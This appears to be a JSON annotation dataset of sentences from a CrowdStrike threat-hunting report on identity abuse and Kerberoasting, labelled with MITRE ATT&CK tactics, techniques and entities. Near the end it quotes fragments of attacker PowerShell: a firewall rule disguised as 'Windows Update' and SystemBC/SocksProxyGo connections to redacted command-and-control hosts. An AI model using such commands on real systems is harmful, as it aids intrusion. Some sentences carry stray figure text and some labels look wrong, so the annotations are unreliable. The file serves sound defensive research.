technique prevalence underscores a notable shift toward exploitation of identity across all stages of adversarial operations.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p9-s76-f2c5ca", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 9, "sentence_id": 76, "context_before": "The technique prevalence underscores a notable shift toward exploitation of identity across all stages of adversarial operations.", "sentence_text": "This shift mirrors the evolution of organizations adapting to an increasingly disparate workforce, highlighting the morphing nature of the modern perimeter.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p9-s77-c69dc2", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 9, "sentence_id": 77, "context_before": "This shift mirrors the evolution of organizations adapting to an increasingly disparate workforce, highlighting the morphing nature of the modern perimeter.", "sentence_text": "No longer defined by a rigid outer shell, organizations today rely on identity as the pivotal control point.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p9-s78-35c369", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 9, "sentence_id": 78, "context_before": "No longer defined by a rigid outer shell, organizations today rely on identity as the pivotal control point.", "sentence_text": "The consistent appearance of valid accounts across various tactics highlights the intensification of adversaries' strategic use of trusted accounts to gain initial access, establish persistence, elevate privileges and evade defenses.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0003", "name": "Persistence" }, { "id": "TA0004", "name": "Privilege Escalation" }, { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1078", "name": "Valid Accounts" } ], "procedure": "appearance of valid accounts", "entities": [ { "text": "appearance of valid accounts", "start": 15, "end": 43, "label": "Action" }, { "text": "adversaries", "start": 101, "end": 112, "label": "MalwareTool" } ] }, { "uid": "crowdstrike-49_crowdstrike_report-p9-s79-dc8b88", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 9, "sentence_id": 79, "context_before": "The consistent appearance of valid accounts across various tactics highlights the intensification of adversaries' strategic use of trusted accounts to gain initial access, establish persistence, elevate privileges and evade defenses.", "sentence_text": "The concerning ease with which adversaries can gain initial access — often simply through purchases — blurs the distinction between legitimate users and imposters.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1078", "name": "Valid Accounts" } ], "procedure": "imposter (purchased) accounts are not distinguished from the legitimate users", "entities": [ { "text": "adversaries ", "start": 31, "end": 43, "label": "MalwareTool" }, { "text": "blurs the distinction between legitimate users and imposters", "start": 102, "end": 162, "label": "Action" } ] }, { "uid": "crowdstrike-49_crowdstrike_report-p9-s80-f7c99d", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 9, "sentence_id": 80, "context_before": "The concerning ease with which adversaries can gain initial access — often simply through purchases — blurs the distinction between legitimate users and imposters.", "sentence_text": "Identifying such stealthy intruders necessitates proactive, identity-based threat hunting combined with a robust understanding of an organization's unique operational landscape.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p9-s81-c82ce9", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 9, "sentence_id": 81, "context_before": "Identifying such stealthy intruders necessitates proactive, identity-based threat hunting combined with a robust understanding of an organization's unique operational landscape.", "sentence_text": "For full details of the techniques and sub-techniques observed by Falcon OverWatch, see the Falcon OverWatch 2023 MITRE ATT&CK heat map.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p9-s82-633edf", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 9, "sentence_id": 82, "context_before": "For full details of the techniques and sub-techniques observed by Falcon OverWatch, see the Falcon OverWatch 2023 MITRE ATT&CK heat map.", "sentence_text": "To learn more about MITRE ATT&CK, visit https://attack.mitre.org/matrices/enterprise/.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p10-s83-2aac01", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 10, "sentence_id": 83, "context_before": "To learn more about MITRE ATT&CK, visit https://attack.mitre.org/matrices/enterprise/.", "sentence_text": "NOWHERE TO HIDE 10 Front-Line Observations Adversaries Advance the Frontier of Identity Threats Key Facts Today, 80% of breaches use compromised identities.4", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p10-s84-d7d460", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 10, "sentence_id": 84, "context_before": "NOWHERE TO HIDE 10 Front-Line Observations Adversaries Advance the Frontier of Identity Threats Key Facts Today, 80% of breaches use compromised identities.4", "sentence_text": "The abuse of identity, particularly when coupled with creative defense evasion methodologies, enables and Figures adversaries to hide in plain sight.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": null, "procedure": "Adversaries abuse identity and defense evasion methods to hide in plain sight.", "entities": [ { "text": "abuse of identity", "start": 4, "end": 21, "label": "Action" }, { "text": "adversaries", "start": 114, "end": 125, "label": "ThreatActor" }, { "text": "hide in plain sight", "start": 129, "end": 148, "label": "Action" } ] }, { "uid": "crowdstrike-49_crowdstrike_report-p10-s85-46bc54", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 10, "sentence_id": 85, "context_before": "The abuse of identity, particularly when coupled with creative defense evasion methodologies, enables and Figures adversaries to hide in plain sight.", "sentence_text": "Despite identity being widely recognized as a at a Glance: growing security threat, the full spectrum of identity threats is not always well understood.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p10-s86-5ef157", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 10, "sentence_id": 86, "context_before": "Despite identity being widely recognized as a at a Glance: growing security threat, the full spectrum of identity threats is not always well understood.", "sentence_text": "This scope may extend to additional factors of authentication INVOLVED THE USE OF DOMAIN or data that can be used for the purposes of identity verification.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p10-s87-0d130a", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 10, "sentence_id": 87, "context_before": "This scope may extend to additional factors of authentication INVOLVED THE USE OF DOMAIN or data that can be used for the purposes of identity verification.", "sentence_text": "A full list ACCOUNTS OR DEFAULT ACCOUNTS can be seen on page 16.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p10-s88-9344d8", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 10, "sentence_id": 88, "context_before": "A full list ACCOUNTS OR DEFAULT ACCOUNTS can be seen on page 16.", "sentence_text": "To ensure environments remain protected, hunters must work with the broadest possible definition of identity, as these types of data are prime targets for 160% adversaries looking to maintain access, enable lateral movement and steal INCREASE IN ATTEMPTS TO information.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p10-s89-5e2d21", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 10, "sentence_id": 89, "context_before": "To ensure environments remain protected, hunters must work with the broadest possible definition of identity, as these types of data are prime targets for 160% adversaries looking to maintain access, enable lateral movement and steal INCREASE IN ATTEMPTS TO information.", "sentence_text": "GATHER SECRET KEYS AND OTHER CREDENTIAL MATERIALS VIA Taking a closer look at the specific techniques involved in identity threats reveals CLOUD INSTANCE METADATA APIs an interesting duality between new and old.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" }, { "id": "TA0009", "name": "Collection" } ], "techniques": [ { "id": "T1059.009", "name": "Cloud API" }, { "id": "T1530", "name": "Data from Cloud Storage" } ], "procedure": "adversaries gather metadata from APIs", "entities": [ { "text": "GATHER", "start": 0, "end": 6, "label": "Infrastructure_Indicator" }, { "text": "CLOUD INSTANCE METADATA APIs", "start": 139, "end": 167, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-49_crowdstrike_report-p10-s90-7471fb", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 10, "sentence_id": 90, "context_before": "GATHER SECRET KEYS AND OTHER CREDENTIAL MATERIALS VIA Taking a closer look at the specific techniques involved in identity threats reveals CLOUD INSTANCE METADATA APIs an interesting duality between new and old.", "sentence_text": "Falcon OverWatch recently discovered and documented the abuse of network provider dynamic link libraries (DLLs) as a means to harvest valid credentials.", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1555", "name": "Credentials from Password Stores" } ], "procedure": "DLLs are used to harvest credentials", "entities": [ { "text": "to harvest", "start": 123, "end": 133, "label": "Action" }, { "text": "dynamic link libraries (DLLs)", "start": 82, "end": 111, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-49_crowdstrike_report-p10-s91-49c36b", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 10, "sentence_id": 91, "context_before": "Falcon OverWatch recently discovered and documented the abuse of network provider dynamic link libraries (DLLs) as a means to harvest valid credentials.", "sentence_text": "A network provider DLL enables the Windows operating system to communicate with other types of networks by providing support for different networking protocols.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p10-s92-cd1b9d", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 10, "sentence_id": 92, "context_before": "A network provider DLL enables the Windows operating system to communicate with other types of networks by providing support for different networking protocols.", "sentence_text": "This newly documented sub-technique5 583% sees adversaries operate without the need to touch the Local Security Authority INCREASE IN KERBEROASTING Subsystem Service (LSASS) or dump the system", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1558.003", "name": "Kerberoasting" } ], "procedure": "increase in Kerberoasting", "entities": [ { "text": "KERBEROASTING ", "start": 134, "end": 148, "label": "Action" }, { "text": "adversaries", "start": 47, "end": 58, "label": "MalwareTool" }, { "text": "operate", "start": 59, "end": 66, "label": "Action" } ] }, { "uid": "crowdstrike-49_crowdstrike_report-p10-s93-2b9dd7", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 10, "sentence_id": 93, "context_before": "This newly documented sub-technique5 583% sees adversaries operate without the need to touch the Local Security Authority INCREASE IN KERBEROASTING Subsystem Service (LSASS) or dump the system", "sentence_text": "Security Account Manager (SAM) ATTACKS (A SUB-TECHNIQUE hive, both of which are often highly monitored by security tools.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p10-s94-799c20", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 10, "sentence_id": 94, "context_before": "Security Account Manager (SAM) ATTACKS (A SUB-TECHNIQUE hive, both of which are often highly monitored by security tools.", "sentence_text": "This sub-technique OF STEAL OR FORGE KERBEROS provides an evasive way to access valid account details.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p10-s95-9f8198", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 10, "sentence_id": 95, "context_before": "This sub-technique OF STEAL OR FORGE KERBEROS provides an evasive way to access valid account details.", "sentence_text": "KERBEROASTING ATTACKS 4 As reported in the CrowdStrike 2023 Global Threat Report: https://www.crowdstrike.com/global-threat-report/.\n5 For more information on this sub-technique, see the MITRE website: https://attack.mitre.org/techniques/T1556/008/.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p11-s96-6a3fef", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 11, "sentence_id": 96, "context_before": "KERBEROASTING ATTACKS 4 As reported in the CrowdStrike 2023 Global Threat Report: https://www.crowdstrike.com/global-threat-report/.\n5 For more information on this sub-technique, see the MITRE website: https://attack.mitre.org/techniques/T1556/008/.", "sentence_text": "NOWHERE TO HIDE 11 DON’T GET BURNED BY KERBEROASTING Over the past year, Falcon OverWatch observed a staggering 583% increase in Kerberoasting attacks6 to escalate privileges and enable lateral movement within a victim’s environment (see Figure 6).", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p11-s97-4359f1", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 11, "sentence_id": 97, "context_before": "NOWHERE TO HIDE 11 DON’T GET BURNED BY KERBEROASTING Over the past year, Falcon OverWatch observed a staggering 583% increase in Kerberoasting attacks6 to escalate privileges and enable lateral movement within a victim’s environment (see Figure 6).", "sentence_text": "Windows devices use the Kerberos authentication protocol, which grants tickets to provide users access based on service principal names (SPNs).", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p11-s98-62fc03", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 11, "sentence_id": 98, "context_before": "Windows devices use the Kerberos authentication protocol, which grants tickets to provide users access based on service principal names (SPNs).", "sentence_text": "Kerberoasting specifically involves the theft of tickets associated with SPNs.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p11-s99-f76d0b", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 11, "sentence_id": 99, "context_before": "Kerberoasting specifically involves the theft of tickets associated with SPNs.", "sentence_text": "These tickets contain encrypted credentials that can be cracked offline using brute-force methods to uncover the plaintext credentials.", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1110", "name": "Brute Force" } ], "procedure": "Cracks encrypted credentials offline using brute-force methods to recover plaintext credentials.", "entities": [ { "text": "encrypted credentials", "start": 22, "end": 43, "label": "Infrastructure_Indicator" }, { "text": "cracked offline using brute-force methods", "start": 56, "end": 97, "label": "Action" } ] }, { "uid": "crowdstrike-49_crowdstrike_report-p11-s100-b28fed", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 11, "sentence_id": 100, "context_before": "These tickets contain encrypted credentials that can be cracked offline using brute-force methods to uncover the plaintext credentials.", "sentence_text": "Despite being well documented, this technique poses a significant threat to organizations because adversaries do not need elevated privileges to execute this Service Principal attack.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p11-s101-c9ad49", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 11, "sentence_id": 101, "context_before": "Despite being well documented, this technique poses a significant threat to organizations because adversaries do not need elevated privileges to execute this Service Principal attack.", "sentence_text": "In the past year, attacks against Kerberos were associated predominantly Name (SPN)\nwith eCrime adversaries.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p11-s102-11906f", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 11, "sentence_id": 102, "context_before": "In the past year, attacks against Kerberos were associated predominantly Name (SPN)\nwith eCrime adversaries.", "sentence_text": "VICE SPIDER was the most prolific eCrime adversary, An SPN is a unique identifier for services responsible for 27% of all intrusions that involved the Kerberoasting technique.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p11-s103-715d13", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 11, "sentence_id": 103, "context_before": "VICE SPIDER was the most prolific eCrime adversary, An SPN is a unique identifier for services responsible for 27% of all intrusions that involved the Kerberoasting technique.", "sentence_text": "running on servers in Active Directory.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p11-s104-68fe5e", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 11, "sentence_id": 104, "context_before": "running on servers in Active Directory.", "sentence_text": "It is especially important when using Kerberos INCIDENTS OF KERBEROASTING authentication.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p11-s105-74375a", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 11, "sentence_id": 105, "context_before": "It is especially important when using Kerberos INCIDENTS OF KERBEROASTING authentication.", "sentence_text": "Adversaries can misuse this feature by scanning for SPNs associated INCREASE with high-privilege accounts.", "relevant": "yes", "tactic": [ { "id": "TA0004", "name": "Privilege Escalation" }, { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1558.003", "name": "Kerberoasting" } ], "procedure": "adversaries gain high privilege accounts by using Kerberoasting", "entities": [ { "text": "Adversaries ", "start": 0, "end": 12, "label": "MalwareTool" }, { "text": "scanning for SPNs ", "start": 39, "end": 57, "label": "Action" } ] }, { "uid": "crowdstrike-49_crowdstrike_report-p11-s106-4c6bd5", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 11, "sentence_id": 106, "context_before": "Adversaries can misuse this feature by scanning for SPNs associated INCREASE with high-privilege accounts.", "sentence_text": "They can perform attacks like Kerberoasting to +583% crack passwords and potentially gain unauthorized access to resources.", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1558.003", "name": "Kerberoasting" } ], "procedure": "adversaries use Kerberoasting", "entities": [ { "text": "They ", "start": 0, "end": 5, "label": "MalwareTool" }, { "text": " perform attacks like Kerberoasting", "start": 8, "end": 43, "label": "Action" } ] }, { "uid": "crowdstrike-49_crowdstrike_report-p11-s107-32d574", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 11, "sentence_id": 107, "context_before": "They can perform attacks like Kerberoasting to +583% crack passwords and potentially gain unauthorized access to resources.", "sentence_text": "2022 2023\nReporting Reporting\nPeriod Period\nOf the interactive intrusions that involved the use of Kerberoasting, Falcon OverWatch identified a range of initial access vectors, including password spraying, accessing existing remote services through valid accounts, and exploiting vulnerable web servers though web application attacks.", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1558.003", "name": "Kerberoasting" } ], "procedure": "use of Kerberoasting", "entities": [ { "text": "use of Kerberoasting", "start": 92, "end": 112, "label": "Action" } ] }, { "uid": "crowdstrike-49_crowdstrike_report-p11-s108-1aa702", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 11, "sentence_id": 108, "context_before": "2022 2023\nReporting Reporting\nPeriod Period\nOf the interactive intrusions that involved the use of Kerberoasting, Falcon OverWatch identified a range of initial access vectors, including password spraying, accessing existing remote services through valid accounts, and exploiting vulnerable web servers though web application attacks.", "sentence_text": "It is not unusual for Falcon OverWatch to observe Kerberoasting being used to facilitate lateral movement from a host without appropriate endpoint security coverage.", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" }, { "id": "TA0008", "name": "Lateral Movement" } ], "techniques": [ { "id": "T1558.003", "name": "Kerberoasting" } ], "procedure": "use of Kerberoasting to facilitate lateral movement", "entities": [ { "text": "Kerberoasting ", "start": 50, "end": 64, "label": "Action" }, { "text": "facilitate lateral movement", "start": 78, "end": 105, "label": "Action" } ] }, { "uid": "crowdstrike-49_crowdstrike_report-p11-s109-72c2fe", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 11, "sentence_id": 109, "context_before": "It is not unusual for Falcon OverWatch to observe Kerberoasting being used to facilitate lateral movement from a host without appropriate endpoint security coverage.", "sentence_text": "6 For more information on this sub-technique, see the MITRE website (https://attack.mitre.org/techniques/T1558/003/)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p11-s111-316f7f", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 11, "sentence_id": 111, "context_before": "©© 20232023", "sentence_text": "AllAll rightsrights reserved.reserved.\nor the detailed article from CrowdStrike (https://www.crowdstrike.com/cybersecurity-101/kerberoasting/).", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p12-s112-242910", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 12, "sentence_id": 112, "context_before": "AllAll rightsrights reserved.reserved.\nor the detailed article from CrowdStrike (https://www.crowdstrike.com/cybersecurity-101/kerberoasting/).", "sentence_text": "NOWHERE TO HIDE 12 Kerberoasting in Action In an intrusion by VICE SPIDER, Falcon OverWatch discovered hands-on-keyboard activity against a victim organization in the academic sector.", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1558.003", "name": "Kerberoasting" } ], "procedure": "VICE SPIDER uses Kerberoasting", "entities": [ { "text": "VICE SPIDER", "start": 62, "end": 73, "label": "ThreatActor" }, { "text": " Kerberoasting", "start": 18, "end": 32, "label": "Action" } ] }, { "uid": "crowdstrike-49_crowdstrike_report-p12-s113-ff6afc", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 12, "sentence_id": 113, "context_before": "NOWHERE TO HIDE 12 Kerberoasting in Action In an intrusion by VICE SPIDER, Falcon OverWatch discovered hands-on-keyboard activity against a victim organization in the academic sector.", "sentence_text": "The compromise was associated with multiple hosts across virtual desktop infrastructure (VDI).", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p12-s114-7f4bb0", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 12, "sentence_id": 114, "context_before": "The compromise was associated with multiple hosts across virtual desktop infrastructure (VDI).", "sentence_text": "The threat actor performed basic host reconnaissance to enumerate domain trusts using nltest, then enumerated administrator permissions groups and performed connectivity tests to outbound infrastructure.", "relevant": "yes", "tactic": [ { "id": "TA0043", "name": "Reconnaissance" }, { "id": "TA0007", "name": "Discovery" } ], "techniques": [ { "id": "T1482", "name": "Domain Trust Discovery" }, { "id": "T1069.002", "name": "Domain Groups" } ], "procedure": "attackers performed basic host reconnaissance", "entities": [ { "text": "The threat actor", "start": 0, "end": 16, "label": "MalwareTool" }, { "text": "host reconnaissance", "start": 33, "end": 52, "label": "Action" }, { "text": "performed ", "start": 147, "end": 157, "label": "Action" }, { "text": "enumerated ", "start": 99, "end": 110, "label": "Action" } ] }, { "uid": "crowdstrike-49_crowdstrike_report-p12-s115-f33b73", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 12, "sentence_id": 115, "context_before": "The threat actor performed basic host reconnaissance to enumerate domain trusts using nltest, then enumerated administrator permissions groups and performed connectivity tests to outbound infrastructure.", "sentence_text": "Next, the threat actor attempted to exploit the ZeroLogon vulnerability in an attempt to escalate privileges and then tested connectivity to a command-and-control (C2) server using ping.", "relevant": "yes", "tactic": [ { "id": "TA0004", "name": "Privilege Escalation" }, { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1210", "name": "Exploitation of Remote Services" }, { "id": "T1095", "name": "Non-Application Layer Protocol" } ], "procedure": "attackers exploit the zerologon vulnerability and tested connectivity to C2", "entities": [ { "text": "threat actor", "start": 10, "end": 22, "label": "ThreatActor" }, { "text": "exploit", "start": 36, "end": 43, "label": "Action" }, { "text": "ZeroLogon vulnerability", "start": 48, "end": 71, "label": "Infrastructure_Indicator" }, { "text": "tested connectivity", "start": 118, "end": 137, "label": "Action" } ] }, { "uid": "crowdstrike-49_crowdstrike_report-p12-s116-11bbb1", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 12, "sentence_id": 116, "context_before": "Next, the threat actor attempted to exploit the ZeroLogon vulnerability in an attempt to escalate privileges and then tested connectivity to a command-and-control (C2) server using ping.", "sentence_text": "The threat actor then executed SystemBC and SocksProxyGo through PowerShell to proxy connections to their C2 infrastructure.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" }, { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1090", "name": "Proxy" }, { "id": "T1059.001", "name": "PowerShell" } ], "procedure": "attackers executed malware through powershell to proxy connection to C2", "entities": [ { "text": " threat actor", "start": 3, "end": 16, "label": "ThreatActor" }, { "text": "executed", "start": 22, "end": 30, "label": "Action" }, { "text": "SocksProxyGo", "start": 44, "end": 56, "label": "MalwareTool" }, { "text": "SystemBC", "start": 31, "end": 39, "label": "MalwareTool" }, { "text": " proxy connections", "start": 78, "end": 96, "label": "Action" } ] }, { "uid": "crowdstrike-49_crowdstrike_report-p12-s117-700579", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 12, "sentence_id": 117, "context_before": "The threat actor then executed SystemBC and SocksProxyGo through PowerShell to proxy connections to their C2 infrastructure.", "sentence_text": "Further, they removed the registry entry for RunMRU and TypedPaths — two locations that would shed light on their interactive activity on the system.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1070.004", "name": "File Deletion" } ], "procedure": "attackers removed the registry for malware", "entities": [ { "text": "removed ", "start": 14, "end": 22, "label": "Action" } ] }, { "uid": "crowdstrike-49_crowdstrike_report-p12-s118-20d9ba", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 12, "sentence_id": 118, "context_before": "Further, they removed the registry entry for RunMRU and TypedPaths — two locations that would shed light on their interactive activity on the system.", "sentence_text": "Snippet of SocksProxyGo execution to configure a new outbound firewall rule New-NetFirewallRule -DisplayName", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1562.007", "name": "Disable or Modify Cloud Firewall" } ], "procedure": "malware creates new rules for firewall", "entities": [ { "text": "SocksProxyGo", "start": 11, "end": 23, "label": "Infrastructure_Indicator" }, { "text": "execution to configure", "start": 24, "end": 46, "label": "Action" }, { "text": "outbound firewall", "start": 53, "end": 70, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-49_crowdstrike_report-p12-s119-653628", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 12, "sentence_id": 119, "context_before": "Snippet of SocksProxyGo execution to configure a new outbound firewall rule New-NetFirewallRule -DisplayName", "sentence_text": "\"Windows Update\" -Direction Outbound -Action Allow -Protocol TCP -RemotePort 443 -Enabled True | Out-Null; Go -remotePort 443 -remoteHost \"", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p12-s120-0625d4", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 12, "sentence_id": 120, "context_before": "\"Windows Update\" -Direction Outbound -Action Allow -Protocol TCP -RemotePort 443 -Enabled True | Out-Null; Go -remotePort 443 -remoteHost \"", "sentence_text": "[REDACTED IPAddress]\" Snippet of the SystemBC proxy connection being established $domain = '[REDACTED IPAddress]' # host $dport = 4001 # port $x = New-Object byte[] 50 For ($i=0; $i -ne 50; $i++)\nAfter this, the adversary executed a script to perform a Kerberoasting attack and enumerate SPNs.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" }, { "id": "TA0006", "name": "Credential Access" }, { "id": "TA0007", "name": "Discovery" } ], "techniques": [ { "id": "T1090", "name": "Proxy" }, { "id": "T1558.003", "name": "Steal or Forge Kerberos Tickets: Kerberoasting" }, { "id": "T1087.002", "name": "Account Discovery: Domain Account" } ], "procedure": "Establish a SystemBC proxy connection, then execute a script to perform Kerberoasting and enumerate SPNs.", "entities": [ { "text": "[REDACTED IPAddress]", "start": 0, "end": 20, "label": "Infrastructure_Indicator" }, { "text": "SystemBC", "start": 37, "end": 45, "label": "MalwareTool" }, { "text": "[REDACTED IPAddress]", "start": 92, "end": 112, "label": "Infrastructure_Indicator" }, { "text": "adversary", "start": 212, "end": 221, "label": "ThreatActor" }, { "text": "executed a script", "start": 222, "end": 239, "label": "Action" }, { "text": "perform a Kerberoasting attack", "start": 243, "end": 273, "label": "Action" }, { "text": "enumerate SPNs", "start": 278, "end": 292, "label": "Action" } ] }, { "uid": "crowdstrike-49_crowdstrike_report-p12-s121-13665c", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 12, "sentence_id": 121, "context_before": "[REDACTED IPAddress]\" Snippet of the SystemBC proxy connection being established $domain = '[REDACTED IPAddress]' # host $dport = 4001 # port $x = New-Object byte[] 50 For ($i=0; $i -ne 50; $i++)\nAfter this, the adversary executed a script to perform a Kerberoasting attack and enumerate SPNs.", "sentence_text": "VICE SPIDER’s likely goal was to capture these SPNs to identify Windows service accounts and extract the password hashes.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p12-s122-fe6411", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 12, "sentence_id": 122, "context_before": "VICE SPIDER’s likely goal was to capture these SPNs to identify Windows service accounts and extract the password hashes.", "sentence_text": "This was confirmed when Falcon OverWatch found the adversary using the Hashcat tool in an attempt to brute-force the password hashes.", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1110.002", "name": "Password Cracking" } ], "procedure": "adversary uses tool to try and brute force through passwords", "entities": [ { "text": "adversary", "start": 51, "end": 60, "label": "MalwareTool" }, { "text": "using the Hashcat tool", "start": 61, "end": 83, "label": "Action" } ] }, { "uid": "crowdstrike-49_crowdstrike_report-p12-s123-52c421", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 12, "sentence_id": 123, "context_before": "This was confirmed when Falcon OverWatch found the adversary using the Hashcat tool in an attempt to brute-force the password hashes.", "sentence_text": 